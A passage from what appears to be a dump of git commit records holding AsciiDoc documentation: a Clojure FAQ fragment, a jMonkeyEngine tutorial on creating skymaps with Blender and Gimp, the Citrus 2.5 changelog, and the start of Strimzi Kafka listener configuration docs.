be returning a function that makes a namespace, and then if you just stick parens around the contents of the file, that would be a regular S expression too. 
Does that imply you can put more than one in a file?**\n\nns is a macro that does a number of things:\n\n- creates a new internal Namespace object (if it does not yet exist)\n- makes that namespace the new current namespace (*ns*)\n- auto-refers all vars from clojure.core and imports all classes from java.lang\n- requires\/refers other namespaces and vars as specified\n- (and other optional things)\n\nns does not return a function or anything invokable as you suggest.\n\nWhile ns is typically placed at the top of a clj file, it is actually just a normal macro and can be invoked at the repl just the same. It could also be used more than once in a single file (although this would be surprising to most clj programmers and would likely not work as desired in AOT).\n\n== Compiler\n\n[[direct_linking_repl]]\n**How does direct linking affect the REPL experience?**\n\nAnything that has been direct linked will not see redefinitions to vars. For example, if you redefine something in clojure.core, other parts of core that use that var will not see the redefinition (however anything that you newly compile at the REPL will). In practice, this is not typically a problem.\n\nFor parts of your own app, you may wish to only enable direct linking when you build and deploy for production, rather than using it when you developing at the REPL. Or you may need to mark parts of your app with ^:redef if you want to always allow redefinition or ^:dynamic for dynamic vars.\n\n== Design and Use\n\n[[encapsulation]]\n**How do you achieve encapsulation with Clojure?**\n\nBecause of its focus on immutable data, there is generally not a high value placed on data encapsulation. Because data is immutable, there is no worry about someone else modifying a value. Likewise, because Clojure data is designed to be manipulated directly, there is significant value in providing direct access to data, rather than wrapping it in APIs.\n\nAll Clojure vars are globally available so again there is not much in the way of encapsulation of functions within namespaces. However, the ability to mark vars private (either using `defn-` for functions or `def` with `^:private` for values) is a convenience for a developer to indicate which parts of an API should be considered public for use vs part of the implementation.\n\n","returncode":0,"stderr":"","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"1d20b96f36396d14b3636daf1e65cdd31c082b9d","subject":"Update free_skymaps.adoc","message":"Update free_skymaps.adoc\n\nSeparated out angular maps browsing into own heading.","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/jme3\/advanced\/free_skymaps.adoc","new_file":"src\/docs\/asciidoc\/jme3\/advanced\/free_skymaps.adoc","new_contents":"= How to create free SkyMaps\n:author: Robert Allen\n:revnumber: \n:revdate: 2017\/04\/4 10:23\n:relfileprefix: ..\/..\/\n:imagesdir: ..\/..\n:experimental: \nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\nThere are a plethora of ways to create skymaps with varying levels of difficulty and expense. The link:http:\/\/planetside.co.uk\/[Terragen] program has been mentioned as one way to do so but it is now limited in its use and for commercial purposes is not free. Another program, link:https:\/\/www.daz3d.com\/bryce-7-pro[Bryce], is also not free and seems to have stalled in development based on there only being a 32bit version available. 
Maybe they are doing things behind the scenes but it's still not a free program. This article's intent is to give the JME3 user other options for the creation of skymaps using the free programs Blender and Gimp. It is not the be all, end all of skymap creation. If you know of better methods or tools please feel free to share your wisdom on the link:https:\/\/hub.jmonkeyengine.org\/[forums].\n\n\n== Blender\n\n\nUsing Blender you can create your skymaps for free. Once link:https:\/\/www.blender.org\/[Blender] is set up, your skymap creation can be done easily. For this article I will go into detail on how to set up Blender to create Angular maps based on a video produced by jMonkey contributor glaucomardano and mentioned in this link:https:\/\/hub.jmonkeyengine.org\/t\/jmonkeyengine-tutorial-how-to-create-skymaps-using-blender\/19313[forum post]. Contributor glaucomardano did a good job on the video but it requires previous knowledge of Blender to be able to easily follow along. As such, I will translate it to paper for you. You can view his video by following this link: link:https:\/\/youtu.be\/z38Aikz5nE8[jMonkeyEngine Tutorial - How to create skymaps using blender].\n\n[NOTE]\n====\nThis tutorial is an adaptation of contributor glaucomardano's production, not an exact duplicate. +\nThese steps assume you're using the default Blender setup and apply to vers 2.78c+. +\nThis is in checklist format so you can mark items as you go to keep your place.\n====\n\n[%interactive]\n.Blender Skybox Checklist\n- [ ] Start with a new file in Blender.\n- [ ] Select the lamp and the default cube in the 3d view or in the Outliner panel (top-right panel) and delete them: kbd:[X]. They are not needed for this procedure.\n- [ ] Select the camera object in the 3d view or in the Outliner panel then clear its location and rotation by using keyboard shortcuts kbd:[Alt]+kbd:[G] and kbd:[Alt]+kbd:[R].\n- [ ] In the properties panel (lower-right panel) select the Object tab (orange box). This will give you a visual perspective of the camera changes you are about to make.\n- [ ] Rename the Camera to Camera-north.\n- [ ] Change your 3d view to top-ortho by pressing kbd:[NumPad 7] followed by kbd:[NumPad 5].\n- [ ] With the camera still selected, press kbd:[R] immediately followed by kbd:[X] immediately followed by 90 immediately followed by kbd:[Enter] to rotate the camera 90 degrees around the X axis.\n- [ ] With the camera still selected, press kbd:[Shift]+kbd:[D]. This will duplicate the camera. Next press kbd:[Enter] to set the selection.\n- [ ] Press kbd:[R] immediately followed by 180 immediately followed by kbd:[Enter]. This will rotate the camera 180 degrees around the Z axis. Rename this camera to Camera-south.\n- [ ] With the camera still selected, press kbd:[Shift]+kbd:[D]. This will duplicate the camera. Next press kbd:[Enter] to set the selection.\n- [ ] With the camera still selected, press kbd:[R] immediately followed by 90 immediately followed by kbd:[Enter]. This will rotate the camera another 90 degrees around the Z axis. Rename this camera to Camera-west.\n- [ ] With the camera still selected, press kbd:[Shift]+kbd:[D]. This will duplicate the camera. Next press kbd:[Enter] to set the selection.\n- [ ] With the camera still selected, press kbd:[R] immediately followed by -180 immediately followed by kbd:[Enter]. This will rotate the camera -180 degrees around the Z axis. 
Rename this camera to Camera-east.\n- [ ] With your mouse inside the 3d view change your view to right-ortho by entering kbd:[NumPad 3].\n- [ ] Select Camera-south in 3d view or in the Outliner panel (top-right panel) and press kbd:[Shift]+kbd:[D]. This will duplicate the camera. Next press kbd:[Enter] to set the selection.\n- [ ] With the camera still selected, press kbd:[R] immediately followed by 90 immediately followed by kbd:[Enter]. This will rotate the camera 90 degrees around the X axis. The camera should now be pointing up. Rename this camera to Camera-up.\n- [ ] With the camera still selected, press kbd:[Shift]+kbd:[D]. This will duplicate the camera. Next press kbd:[Enter] to set the selection.\n- [ ] With the camera still selected, press kbd:[R] immediately followed by 180 immediately followed by kbd:[Enter]. This will rotate the camera 180 degrees along the X axis. The camera should now be facing down. Rename this camera to Camera-down.\n- [ ] Save your file.\n\n[%interactive]\n.Angular Map\n- [ ] Open up a web browser and search for \"free high res skymap\" and select an Angular map of your choice, or you can find some at link:https:\/\/blenderartists.org\/forum\/showthread.php?24038-Free-high-res-skymaps-%2528Massive-07-update!%2529[https:\/\/blenderartists.org\/forum\/showthread.php?24038-Free-high-res-skymaps-%2528Massive-07-update!%2529] instead. Remember to select an *ANGULAR* map.\n- [ ] Save a map to your PC in a place you can easily locate later from Blender.\n\n[%interactive]\n.Textures Tab\n- [ ] From the properties panel (bottom-right panel) select the Textures tab (red-white checkerboard) then press the new button to create a new texture. Rename this texture to AngMap.\n- [ ] Under the Image panel select open and navigate to the file you saved earlier.\n- [ ] In the Mapping panel select AngMap from the drop down box.\n- [ ] In the Influence panel de-select blend (ble) and select horizon (hor).\n\n[%interactive]\n.Data Tab\n- [ ] From the properties panel select the Data tab (reel to reel camera).\n- [ ] In the lens panel change the Focal Lens value from 35 to 16. Do this for every camera.\n\n[%interactive]\n.Render Tab\n- [ ] From the properties panel select the Render tab (normal looking camera).\n- [ ] In the Dimensions panel set the resolution to any number that is a power of 2. For this example 1024 x 1024. \n- [ ] Slide the resolution scale to 100%.\n- [ ] In the Output panel change the image type to JPEG. I have found out by trial and error that using a JPEG file has the same image quality as a PNG or DDS file but with a huge difference in image size. A single PNG image will clock in at over 8mb compared to the JPEG size of 325kb. Even converting to a DDS file comes in at over 3mb for comparison (using RGB888 as is recommended by Momoko_Fan\/Core Developer in this link:https:\/\/hub.jmonkeyengine.org\/t\/best-dds-format-for-skyfactory\/17668\/2[forum post]) with no gain in image quality that I could see. You're welcome to experiment on your own if you wish.\n- [ ] Set the image format to RGB.\n- [ ] Setting the quality slider to 0 has the effect of reducing the image size. 
In this example it reduced the image sizes to less than 125kb, once again with no discernible image degradation that I could see.\n\n[%interactive]\n.World Tab\n- [ ] In the properties panel select the World tab.\n- [ ] Check the Real Sky toggle.\n\n[%interactive]\n.Map Generator Setup \n- [ ] From the header at the top of the 3d view click the btn:[Choose Screen Layout] button next to the word `Default` and select `Split Verticle F\/R`. \n- [ ] Click the `+` sign to create a new layout. \n- [ ] Rename this new layout Angular Map Generator or a name of your choosing.\n- [ ] In the left side 3d view, at the bottom, next to the word view, is the btn:[Current Editor Type] button. Click it and change it to `UV\/Image Editor`.\n- [ ] Place your mouse inside the right side 3d view and press kbd:[NumPad 5] to toggle ortho view. You're now set up to render your Angular map.\n- [ ] Save your file.\n\n[%interactive]\n.Rendering And Saving\n- [ ] With your first camera selected (in this case Camera-down) and your mouse inside the right side 3d view, press kbd:[Ctrl]+kbd:[NumPad 0] to set your selected camera to be the active camera.\n- [ ] Press kbd:[F12] to render the scene. An image will appear in the left side UV\/Image Editor.\n- [ ] With your mouse inside the left side UV\/Image Editor you can scroll in or out to center the view.\n- [ ] With your mouse inside the left side UV\/Image Editor press kbd:[F3] to save your image. Rename the image (down.jpg in this case). \n\nFollow this same procedure for the remaining cameras, rendering, renaming and saving each. After you have rendered all your images you can copy and paste them into your asset folder for JME3, usually under the Texture directory. To use them in your code, in simpleInitApp(), load the Textures and use the SkyFactory to create your sky.\n\n[source,java]\n----\nTexture west = getAssetManager().loadTexture(\"Textures\/Sky\/west.jpg\");\nTexture east = getAssetManager().loadTexture(\"Textures\/Sky\/east.jpg\");\nTexture north = getAssetManager().loadTexture(\"Textures\/Sky\/north.jpg\");\nTexture south = getAssetManager().loadTexture(\"Textures\/Sky\/south.jpg\");\nTexture up = getAssetManager().loadTexture(\"Textures\/Sky\/up.jpg\");\nTexture down = getAssetManager().loadTexture(\"Textures\/Sky\/down.jpg\");\ngetRootNode().attachChild(SkyFactory.createSky(getAssetManager(), west, east, north, south, up, down));\n----\n\nListed below are other Blender tutorials JME3 users may find valuable. \n\n* link:https:\/\/www.katsbits.com\/tutorials\/blender\/cycles-skybox.php[Render a Skybox using Cycles]\n* link:https:\/\/www.katsbits.com\/tutorials\/blender\/render-skybox.php[Render a Skybox Environment Map]\n\nMany thanks go out to contributor glaucomardano for his video. He has excellent taste in music.\n\n\n== Gimp\n\n\nYou can use link:https:\/\/www.gimp.org\/[Gimp] to create SkyMaps from a single image with the addition of 2 scripts.\n\n* link:https:\/\/code.google.com\/archive\/p\/gimp-dds\/[Gimp-dds]\n* link:http:\/\/registry.gimp.org\/node\/25532[Cubemap Layers Generator]\n\nAfter installing the scripts you open an image in Gimp. This script works by slicing up the image into 6 layers of equal size, each sized to a power of 2. \n\n. After you open the image you select `menu:Filters[Generic > Cubemap Layers Generator]`.\n. Fill in the details as follows. \n** Source: navigate to the image you are slicing.\n** Cubemap layout: `Cross Horizontal`\n** 2 to the power of: `10` (for 1024 sized Layers) \n. 
Press btn:[OK] to slice up the image.\n. Select `menu:File[Export As]` and change the `Name` and `File Type` to `.dds` and choose your save location to export into.\n. Press btn:[Export].\n* Compression: `None`\n* Format: `RGB8`\n* Save: `As cube map`\n* MipMaps: `No mipmaps`\n. Press btn:[OK] to export.\n\nYou add it to your scene as is explained in the <<jme3\/advanced\/sky#,How to add a Sky to your Scene>> tutorial.\n","old_contents":"= How to create free SkyMaps\n:author: Robert Allen\n:revnumber: \n:revdate: 2017\/04\/4 10:23\n:relfileprefix: ..\/..\/\n:imagesdir: ..\/..\n:experimental: \nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\nThere are a plethora of ways to create skymaps with varying levels of difficulty and expense. The link:http:\/\/planetside.co.uk\/[Terragen] program has been mentioned as one way to do so but it is now limited in its use and for commercial purposes is not free. Another program, link:https:\/\/www.daz3d.com\/bryce-7-pro[Bryce], is also not free and seems to of stalled in development based off there only being a 32bit version available. Maybe they are doing things behind the scenes but its still not a free program. This articles intent is to give the JME3 user other options for the creation of skymaps using the free programs Blender and Gimp. It is not the be all, end all of skymap creation. If you know of better methods or tools please feel free to share your wisdom on the link:https:\/\/hub.jmonkeyengine.org\/[forums].\n\n\n== Blender\n\n\nUsing Blender you can create your skymaps for free. Once link:https:\/\/www.blender.org\/[Blender] is setup, your skymaps creation can be done easily. For this article I will go into detail on how to setup Blender to create Angular maps based off a video produced by jMonkey contributor glaucomardano and mentioned in this link:https:\/\/hub.jmonkeyengine.org\/t\/jmonkeyengine-tutorial-how-to-create-skymaps-using-blender\/19313[forum post]. Contributor glaucomardano did a good job on the video but it requires previous knowledge of Blender to be able to easily follow along. As such, I will translate it to paper for you. You can view his video by following this link: link:https:\/\/youtu.be\/z38Aikz5nE8[jMonkeyEngine Tutorial - How to create skymaps using blender].\n\n[NOTE]\n====\nThis tutorial is an adaptation of contributor glaucomardanos production, not an exact duplicate. +\nThese steps assume you're using the default blender setup and apply to vers 2.78c+. +\nThis is in checklist format so you can mark items as you go to keep your place.\n====\n\n[%interactive]\n.Blender Skybox Checklist\n- [ ] Start with a new file in blender.\n- [ ] Select the lamp and the default cube in the 3d view or in the Outliner panel (top-right panel) and delete them: kbd:[X]. They are not needed for this procedure.\n- [ ] Select the camera object in the 3d view or in the Outliner panel then clear its location and rotation by using keyboard shortcuts kbd:[Alt]+kbd:[G] and kbd:[Alt]+kbd:[R].\n- [ ] In the properties panel (lower-right panel) select the Object tab (orange box). 
This will give you a visual perspective of the camera changes you are about to make.\n- [ ] Rename the Camera to Camera-north.\n- [ ] Change your 3d view to top-ortho by pressing kbd:[NumPad 7] followed by kbd:[NumPad 5].\n- [ ] With the camera still selected, press kbd:[R] immediately followed by kbd:[X] immediately followed by 90 immediately followed by kbd:[Enter] to rotate the camera 90 degrees around the X axis.\n- [ ] With the camera still selected, press kbd:[Shift]+kbd:[D]. This will duplicate the camera. Next press kbd:[Enter] to set the selection.\n- [ ] Press kbd:[R] immediately followed by 180 immediately followed by kbd:[Enter]. This will rotate the camera 180 degrees around the Z axis. Rename this camera to Camera-south.\n-\u00a0[ ] With the camera still selected, press kbd:[Shift]+kbd:[D]. This will duplicate the camera. Next press kbd:[Enter] to set the selection.\n- [ ] With the camera still selected, press kbd:[R] immediately followed by 90 immediately followed by kbd:[Enter]. This will rotate the camera another 90 degrees around the Z axis. Rename this camera to Camera-west.\n- [ ] With the camera still selected, press kbd:[Shift]+kbd:[D]. This will duplicate the camera. Next press kbd:[Enter] to set the selection.\u00a0\u00a0 \n- [ ] With the camera still selected, press kbd:[R] immediately followed by -180 immediately followed by kbd:[Enter]. This will rotate the camera -180 degrees around the Z axis. Rename this camera to Camera-east.\n- [ ] With your mouse inside the 3d view change your view to right-ortho by entering kbd:[NumPad 3].\n- [ ] Select Camera-south in 3d view or in the Outliner panel (top-right panel) and press kbd:[Shift]+kbd:[D]. This will duplicate the camera. Next press kbd:[Enter] to set the selection.\n- [ ] With the camera still selected, press kbd:[R] immediately followed by 90 immediately followed by kbd:[Enter]. This will rotate the camera 90 degrees around the X axis. The camera should now be pointing up. Rename this camera to Camera-up.\n- [ ] With the camera still selected, press kbd:[Shift]+kbd:[D]. This will duplicate the camera. Next press kbd:[Enter] to set the selection.\n- [ ] With the camera still selected, press kbd:[R] immediately followed by 180 immediately followed by kbd:[Enter]. This will rotate the camera 180 degrees along the X axis. The camera should now be facing down. Rename this camera to Camera-down.\n- [ ] Save your file.\n- [ ] Open up a web browser and search for \"free high res skymap\" and select a Angular map of your choice or you can find some here at link:https:\/\/blenderartists.org\/forum\/showthread.php?24038-Free-high-res-skymaps-%2528Massive-07-update!%2529[https:\/\/blenderartists.org\/forum\/showthread.php?24038-Free-high-res-skymaps-%2528Massive-07-update!%2529] instead. Remember to select an *ANGULAR* map.\n- [ ] Save a map to your pc in a place you can easily locate it from later in blender.\n\n[%interactive]\n.Textures Tab\n- [ ] From the properties panel (bottom-right panel) select the Textures tab (red-white checkerboard) then press the new button to create a new texture. Rename this texture to AngMap.\n- [ ] Under the Image panel select open and navigate to the file you saved earlier.\n- [ ] In the Mapping panel select AngMap from the drop down box.\n- [ ] In the Influence panel de-select blend (ble) and select horizon (hor).\n\n[%interactive]\n.Data Tab\n- [ ] From the properties panel select the Data tab (reel to reel camera).\n- [ ] In the lens panel change the Focal Lens value from 35 to 16. 
Do this for every camera.\n\n[%interactive]\n.Render Tab\n- [ ] From the properties panel select the Render tab (normal looking camera).\n- [ ] In the Dimensions panel set the resolution to any number that is a power of 2. For this example 1024 x 1024. \n- [ ] Slide the resolution scale to 100%.\n- [ ] In the Output panel change the image type to JPEG. I have found out by trial and error that using a JPEG file has the same image quality as a PNG or DDS file but with a huge difference in image size. A single PNG image will clock in at over 8mb to the JPEG size of 325kb. Even converting to a DDS file comes in at over 3mb for comparison (using RGB888 as is recommended by Momoko_Fan\/Core Developer in this link:https:\/\/hub.jmonkeyengine.org\/t\/best-dds-format-for-skyfactory\/17668\/2[forum post]) with no gain in image quality that I could see. Your welcome to experiment on your own if you wish.\n- [ ] Set the image format to RGB.\n- [ ] Setting the quality slider to 0 has the effect of reducing the image size. In this example it reduced the image sizes to less than 125kb, once again with no discernable image degradation that I could see.\n\n[%interactive]\n.World Tab\n- [ ] In the properties panel select the World tab.\n- [ ] Check the Real Sky toggle.\n\n[%interactive]\n.Map Generator Setup \n- [ ] From the header at the top of the 3d view click the btn:[Choose Screen Layout] button next to the word `Default` and select `Split Verticle F\/R`. \n- [ ] Click the `+` sign to create a new layout. \n- [ ] Rename this new layout Angular Map Generator or a name of your choosing.\n- [ ] In the left side 3d view, at the bottom, next to the word view, is the btn:[Current Editor Type] button. Click it and change it to `UV\/Image Editor`.\n- [ ] Place your mouse inside the right side 3d view and press kbd:[NumPad 5] to toggle ortho view. You're now setup to render your Angular map.\n- [ ] Save your file.\n\n[%interactive]\n.Rendering And Saving\n- [ ] With your first camera selected (in this case Camera-down) and your mouse inside the right side 3d view, press kbd:[Ctrl]+kbd:[NumPad 0] to set your selected camera to be the active camera.\u00a0\n- [ ] Press kbd:[F12] to render the scene. A image will appear in the left side UV\/Image Editor.\n- [ ] With your mouse inside the left side UV\/Image Editor you can scroll in or out to center the view.\n- [ ] With your mouse inside the left side UV\/Image Editor press kbd:[F3] to save your image. Rename the image (down.jpg in this case). \n\nFollow this same procedure for the remaining cameras. Rendering, renaming and saving each. After you have rendered all your images you can copy and paste them into your asset folder for JME3. Usually under the Texture directory. To use them in your code, in simpleInitApp(), load the Textures and use the SkyFactory to create your sky.\n\n[source,java]\n----\nTexture west = getAssetManager().loadTexture(\"Textures\/Sky\/west.jpg\");\nTexture east = getAssetManager().loadTexture(\"Textures\/Sky\/east.jpg\");\nTexture north = getAssetManager().loadTexture(\"Textures\/Sky\/north.jpg\");\nTexture south = getAssetManager().loadTexture(\"Textures\/Sky\/south.jpg\");\nTexture up = getAssetManager().loadTexture(\"Textures\/Sky\/up.jpg\");\nTexture down = getAssetManager().loadTexture(\"Textures\/Sky\/down.jpg\");\ngetRootNode().attachChild(SkyFactory.createSky(getAssetManager(), west, east, north, south, up, down));\n----\n\nListed below are other Blender tutorials JME3 users may find valuable. 
\n\n* link:https:\/\/www.katsbits.com\/tutorials\/blender\/cycles-skybox.php[Render a Skybox using Cycles]\n* link:https:\/\/www.katsbits.com\/tutorials\/blender\/render-skybox.php[Render a Skybox Environment Map]\n\nMany thanks go out to contributor glaucomardano for his video. He has excellent taste in music.\n\n\n== Gimp\n\n\nYou can use link:https:\/\/www.gimp.org\/[Gimp] to create SkyMaps from a single image with the addition of 2 scripts.\n\n* link:https:\/\/code.google.com\/archive\/p\/gimp-dds\/[Gimp-dds]\n* link:http:\/\/registry.gimp.org\/node\/25532[Cubemap Layers Generator]\n\nAfter installing the scripts you open a image in gimp. This script works by slicing up the image into 6 layers of equal size, each by the power of 2. \n\n. After you open the image you select `menu:Filters[Generic > Cubemap Layers Generator]`.\n. Fill in the details as follows. \n** Source: navigate to the image you are slicing.\n**\u00a0 Cubemap layout: `Cross Horizontal`\n** 2 to the power of: `10` (for 1024 sized Layers) \n. Press btn:[OK] to slice up the image.\n. Select `menu:File[Export As]` and change the `Name` and `File Type` to `.dds` and choose your save location to export into.\n. Press btn:[Export].\n* Compression: `None`\n* Format: `RGB8`\n* Save: `As cube map`\n* MipMaps: `No mipmaps`\n. Press btn:[OK] to export.\n\nYou add it to your scene as is explained in the <<jme3\/advanced\/sky#,How to add a Sky to your Scene>> tutorial.\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"4365150b2ec846dfc71fde6de5ee554d8ce7c961","subject":"Update 2014-02-28-Write-once-run-No-write-as-often-as-possible.adoc","message":"Update 2014-02-28-Write-once-run-No-write-as-often-as-possible.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2014-02-28-Write-once-run-No-write-as-often-as-possible.adoc","new_file":"_posts\/2014-02-28-Write-once-run-No-write-as-often-as-possible.adoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"mit","lang":"AsciiDoc"} {"commit":"6ffdca3806cd72183e61cafe2e493f389cb54edf","subject":"Fixed broken link in the 2.5 changelog","message":"Fixed broken link in the 2.5 changelog\n","repos":"christophd\/citrus,christophd\/citrus","old_file":"src\/manual\/changes-2-5.adoc","new_file":"src\/manual\/changes-2-5.adoc","new_contents":"[[changes-2-5]]\n== Changes in Citrus 2.5\n\nWe have added lots of new features and improvements with Citrus 2.5. Namely these are the new modules for RMI and JMX support, a new x-www-form-urlencoded message validator and new functions and test actions. Just have a look at the following features that made it to the box.\n\n[[changes-hamcrest-matcher]]\n=== Hamcrest matcher support\n\nHamcrest is a very powerful matcher library that provides a fantastic set of matcher implementations for message validation purposes. Citrus now supports these matchers coming from the Hamcrest library. On the one hand you can use Hamcrest matchers as a Citrus validation matcher as described in link:validation-matcher-hamcrest[validation-matcher-hamcrest]. On the other hand you can use Hamcrest matchers now directly using the Citrus Java DSL. See details for this feature in link:json-path-validate[json-path-validate].\n\n[[changes-binary-base64-message-validator]]\n=== Binary base64 message validator\n\nThere is a new message validator implementation that automatically converts binary message content to a base64 encoded String representation for comparison. 
This is the easiest way to compare binary message content with an expected message payload. See link:#binary-message-validation[binary-message-validation] for how this works.\n\n[[changes-rmi]]\n=== RMI support\n\nRemote method invocation is a standard Java technology and API for calling methods on remote objects across different JVM instances. Although RMI has lost its popularity it is still used in legacy components. Testing RMI bean invocation is a hard thing to do. Now Citrus provides client and server support for remote interface invocation. See link:rmi[rmi] for details.\n\n[[changes-jmx]]\n=== JMX support\n\nSimilar to RMI, JMX can be used to connect to remote bean invocation. This time we expose some beans to a managed bean server in order to be managed by JMX operations for read and write. With Citrus 2.5 we have added client and server support for calling and providing managed beans on an MBean server. See link:jmx[jmx] for details.\n\n[[changes-resource-injection]]\n=== Resource injection\n\nWith 2.5 we have added mechanisms for injecting Citrus components into your Java DSL test methods. This is very useful when needing access to the Citrus test context, for instance. Also we are able to use new injection of test designer and runner instances in order to support parallel test execution with multiple threads. See the explanations in link:testcase-resource-injection[testcase-resource-injection] and link:testcase-context-injection[testcase-context-injection].\n\n[[changes-http-x-www-form-urlencoded-message-validator]]\n=== Http x-www-form-urlencoded message validator\n\nHTML form data can be transmitted with different methods and content types. One of the most common ways is to use *x-www-form-urlencoded* form data content. As validation can be tricky we have added a special message validator for that. See link:http-www-form-urlencoded[http-www-form-urlencoded] for details.\n\n[[changes-date-range-validation-matcher]]\n=== Date range validation matcher\n\nAdded a new validation matcher implementation that is able to check that a date value is within a certain date range (from and to). The date range is able to focus on days as well as additional time (hour, minute, second) specifications. See link:validation-matcher-daterange[validation-matcher-daterange] for details.\n\n[[changes-read-file-resource-function]]\n=== Read file resource function\n\nA new function implementation offers you the possibility to read file resource contents as inline data. The function is called and returns the file content as its return value. The file content is then placed right where the function was called, e.g. inside of a message payload element or as a message header value. See link:functions-read-file[functions-read-file] for details.\n\n[[changes-timer-container]]\n=== Timer container\n\nThe new timer test action container repeats its execution based on a time expression (e.g. every 5 seconds). With this timer we can repeat test actions with a fixed time delay or constantly execute test actions on a time schedule. See link:containers-timer[containers-timer] and link:actions-stop-timer[actions-stop-timer] for details.\n\n[[changes-upgrade-to-vertx-3-2-0]]\n=== Upgrade to Vert.x 3.2.0\n\nThe Vert.x module was upgraded to use Vert.x 3.2.0 version. The Citrus module implementation was updated to work with this new Vert.x version. 
Learn more about the Vert.x integration in Citrus with link:vertx[vertx].","old_contents":"[[changes-2-5]]\n== Changes in Citrus 2.5\n\nWe have added lots of new features and improvements with Citrus 2.5. Namely these are the new modules for RMI and JMX support, a new x-www-form-urlencoded message validator and new functions anc test actions. Just have a look at the following features that made it to the box.\n\n[[changes-hamcrest-matcher]]\n=== Hamcrest matcher support\n\nHamcrest is a very powerful matcher library that provides a fantastic set of matcher implementations for message validation purpose. Citrus now supports these matchers coming from Hamcrest library. On the one hand you can use Hamcrest matchers as a Citrus validation matcher as described in link:validation-matcher-hamcrest[validation-matcher-hamcrest]. On the other hand you can use Hamcrest matchers now directly using the Citrus Java DSL. See details for this feature in link:json-path-validate[json-path-validate].\n\n[[changes-binary-base64-message-validator]]\n=== Binary base64 message validator\n\nThere is a new message validator implementation that automatically converts binary message content to a base64 encoded String representation for comparison. This is the easiest way to compare binary message content with an expected message payload. See link:validation-binary[validation-binary]how this is working for you.\n\n[[changes-rmi]]\n=== RMI support\n\nRemote method invocation is a standard Java technology and API for calling methods on remote objects across different JVM instances. Although RMI has lost its popularity it is still used in legacy components. Testing RMI bean invocation is a hard thing to do. Now Citrus provides client and server support for remote interface invocation. See link:rmi[rmi] for details.\n\n[[changes-jmx]]\n=== JMX support\n\nSimilar to RMI JMX can be used to connect to remote bean invocation. This time we expose some beans to a managed bean server in order to be managed by JMX operations for read and write. With Citrus 2.5 we have added a client and server support for calling and providing managed beans on a mbean server. See link:jmx[jmx] for details.\n\n[[changes-resource-injection]]\n=== Resource injection\n\nWith 2.5 we have added mechanisms for injecting Citrus components to your Java DSL test methods. This is very useful when needing access to the Citrus test context for instance. Also we are able to use new injection of test designer and runner instances in order to support parallel test execution with multiple threads. See the explanations in link:testcase-resource-injection[testcase-resource-injection]and link:testcase-context-injection[testcase-context-injection].\n\n[[changes-http-x-www-form-urlencoded-message-validator]]\n=== Http x-www-form-urlencoded message validator\n\nHTML form data can be transmitted with different methods and content types. One of the most common ways is to use *x-www-form-urlencoded* form data content. As validation can be tricky we have added a special message validator for that. See link:http-www-form-urlencoded[http-www-form-urlencoded]for details.\n\n[[changes-date-range-validation-matcher]]\n=== Date range validation matcher\n\nAdded a new validation matcher implementation that is able to check that a date value is between a certain date range (from and to) The date range is able to focus on days as well as additional time (hour, minute, second) specifications. 
See link:validation-matcher-daterange[validation-matcher-daterange]for details.\n\n[[changes-read-file-resource-function]]\n=== Read file resource function\n\nA new function implementation offers you the possibilities to read file resource contents as inline data. The function is called and returns the file content as return value. The file content is then placed right where the function was called e.g. inside of a message payload element or as message header value. See link:functions-read-file[functions-read-file]for details.\n\n[[changes-timer-container]]\n=== Timer container\n\nThe new timer test action container repeats its execution based on a time expression (e.g. every 5 seconds). With this timer we can repeat test actions with a fixed time delay or constantly execute test actions with time schedule. See link:containers-timer[containers-timer]and link:actions-stop-timer[actions-stop-timer]for details.\n\n[[changes-upgrade-to-vertx-3-2-0]]\n=== Upgrade to Vert.x 3.2.0\n\nThe Vert.x module was upgraded to use Vert.x 3.2.0 version. The Citrus module implementation was updated to work with this new Vert.x version. Learn more about the Vert.x integration in Citrus with link:vertx[vertx].","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"77faa6e4acee03d21b20e07b5fee6da505c30e61","subject":"Fix alternative names example in documentation (#3863)","message":"Fix alternative names example in documentation (#3863)\n\nSigned-off-by: Jakub Scholz <c50267b906a652f2142cfab006e215c9f6fdc8a0@scholzj.com>","repos":"ppatierno\/kaas,scholzj\/barnabas,scholzj\/barnabas,ppatierno\/kaas","old_file":"documentation\/api\/io.strimzi.api.kafka.model.listener.arraylistener.GenericKafkaListenerConfigurationBootstrap.adoc","new_file":"documentation\/api\/io.strimzi.api.kafka.model.listener.arraylistener.GenericKafkaListenerConfigurationBootstrap.adoc","new_contents":"Configures bootstrap service overrides for external listeners.\n\nBroker service equivalents of `nodePort`, `host`, `loadBalancerIP` and `annotations` properties are configured in the xref:type-GenericKafkaListenerConfigurationBroker-reference[`GenericKafkaListenerConfigurationBroker` schema].\n\n[id='property-listener-config-altnames-{context}']\n=== `alternativeNames`\n\nYou can specify alternative names for the bootstrap service.\nThe names are added to the broker certificates and can be used for TLS hostname verification.\nThe `alternativeNames` property is applicable to all types of external listeners.\n\n.Example of an external `route` listener configured with an additional bootstrap address\n[source,yaml,subs=\"attributes+\"]\n----\nlisteners:\n #...\n - name: external\n port: 9094\n type: route\n tls: true\n authentication:\n type: tls\n configuration:\n bootstrap:\n alternativeNames:\n - example.hostname1\n - example.hostname2\n# ...\n----\n\n[id='property-listener-config-host-{context}']\n=== `host`\n\nThe `host` property is used with `route` and `ingress` listeners to specify the hostnames used by the bootstrap and per-broker services.\n\nA `host` property value is mandatory for `ingress` listener configuration, as the Ingress controller does not assign any hostnames automatically.\nMake sure that the hostnames resolve to the Ingress endpoints.\nStrimzi will not perform any validation that the requested hosts are available and properly routed to the Ingress endpoints.\n\n.Example of host configuration for an ingress listener\n[source,yaml,subs=\"attributes+\"]\n----\nlisteners:\n #...\n - name: external\n 
